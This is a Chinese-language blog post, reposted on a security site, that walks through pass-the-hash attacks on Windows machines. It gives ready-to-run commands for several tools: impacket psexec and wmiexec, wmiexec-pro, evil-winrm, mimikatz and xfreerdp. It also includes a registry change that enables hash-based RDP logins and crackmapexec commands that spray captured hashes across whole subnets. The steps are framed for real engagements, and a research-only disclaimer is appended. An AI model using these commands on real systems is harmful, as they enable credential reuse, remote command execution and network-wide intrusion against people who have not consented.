PTH常用攻击

admin
admin
admin
138876
文章
114
评论
2024年11月11日23:39:06评论7 views字数 2353阅读7分50秒阅读模式

前言:

参考一些文章,简单的总结一下PTH攻击的一些常用方法。

文中涉及的工具回复20230504获取

利用445端口:

为了更直观的展现,这里做个代理来进行演示:

对于开放445端口的主机,

利用impacket工具包psexec:

proxychains python3 psexec.py "./administrator"@192.168.235.134-hashes :8b2d95d5bc332c33b11cxxxx
PTH常用攻击

这里会出现乱码,更换个编码形式就行了:

proxychains python3 psexec.py "./administrator"@192.168.235.134-hashes :8b2d95d5bc332c33b11cxxxx-codec gbk
PTH常用攻击

这里注意两个东西,一个是连接目标主机的445端口,另一个是脚本使用过程中会上传一个exe文件,这个文件是有毒的,会被杀软杀。

PTH常用攻击

所以我们一般使用wmiexec脚本来进行pth:

proxychains python3 wmiexec.py "./administrator"@192.168.235.134-hashes :8b2d95d5bc332c33b11cdxxxxx-codec gbk
PTH常用攻击

这里会同时连接目标主机的445,135以及随机的一个高端口

利用135端口:

当目标主机的445端口受到限制时,也可以直接利用135端口来进行一个pth攻击

这里参考文章https://mp.weixin.qq.com/s/FzesFjuhcag8UsSV_RLA1A

写的不错,里面的工具也挺好。

直接利用该工具:

proxychains python3 wmiexec-pro.py "./administrator"@192.168.235.134-hashes :8b2d95d5bc332c33b11cd0e58505f481exec-command -command "ipconfig"-with-output
PTH常用攻击

可以看到直接利用135端口和一个随机高端口也能执行命令并回显。

利用5985端口:

当135,445都受到限制时,也可以借助5985端口来进行pth攻击:

参考文章:https://forum.butian.net/share/2080

工具直接拿过来用:

proxychains ./evil-winrm.rb -192.168.235.134-u administrator -8b2d95d5bc332c33b11cxxxx
PTH常用攻击

可以看到,不借助135,445也可以直接执行命令并回显。

PTHRDP:

实战中获取到管理员的hash时,如何直接利用该hash登录管理员的桌面。

PS:实战中可能会有人直接挂个代理,然后想利用这种方法登录管理员桌面,这种方法是不行的。

第一种方法是可以利用内网中的其他跳板机来利用这种方法登录管理员桌面

第二种方法是利用高权限在目标机器上创建一个账户,登录该账户后,利用该账户在目标机器上使用该方法登录管理员桌面。

方法:

修改注册表:

REG ADD "HKLMSystemCurrentControlSetControlLsa"/DisableRestrictedAdmin/t REG_DWORD /00000000/f

利用mimikatz:

sekurlsa::pth /user:administrator /domain:./ntlm:8b2d95d5bc332c33b11cd0e58xxxx"/run:mstsc.exe /restrictedadmin"
PTH常用攻击

在弹出的mstsc输入登录的地址就可以直接登陆了

PTH常用攻击

利用xfreerdp登录:

我们还可以利用kali自带的工具xfreerdp来实现hash值登录管理员桌面

修改注册表:

REG ADD "HKLMSystemCurrentControlSetControlLsa"/DisableRestrictedAdmin/t REG_DWORD /00000000/f
proxychains xfreerdp /v:192.168.18.128/d:./u:administrator /pth:8b2d95d5bc332c33b11cxxxxx/sound
PTH常用攻击

批量pth攻击:

在获取不到明文或者明文比较少数的情况下,也可以直接利用hash进行一个批量的横向

利用kali自带工具:crackmapexec

该工具爆破速度比较快,非常准确。

可以看到支持如下协议:

PTH常用攻击

假设我们在实战中获得了如下hahs值:

8b2d95d5bc332c33b11cd0xxxxxx
ae9060c5c6c00bd33e78exxxxxxx

假如我们要对192.168.235.0/24这个段进行横向:

利用smb协议:(445端口没限制)

crackmapexec smb 192.168.235.0/24-u administrator -H hash.txt
PTH常用攻击

利用winrm:

这个东西和上面的5985端口是同一个东西,不过crackmapexec集成了这个东西:

crackmapexec winrm 192.168.235.0/24-u administrator -H hash.txt
PTH常用攻击

PS:

还可以对特定ip进行批量横向,比如在实战中我把开放445端口主机的ip提取出来:

crackmapexec smb ip.txt -u administrator -H hash.txt
crackmapexec winrm ip.txt -u administrator -H hash.txt

还可以对ssh,mssql进行横向,非常好的一个工具。

原文始发于微信公众号(安全小子大杂烩):PTH常用攻击

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月11日23:39:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PTH常用攻击https://cn-sec.com/archives/2479037.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息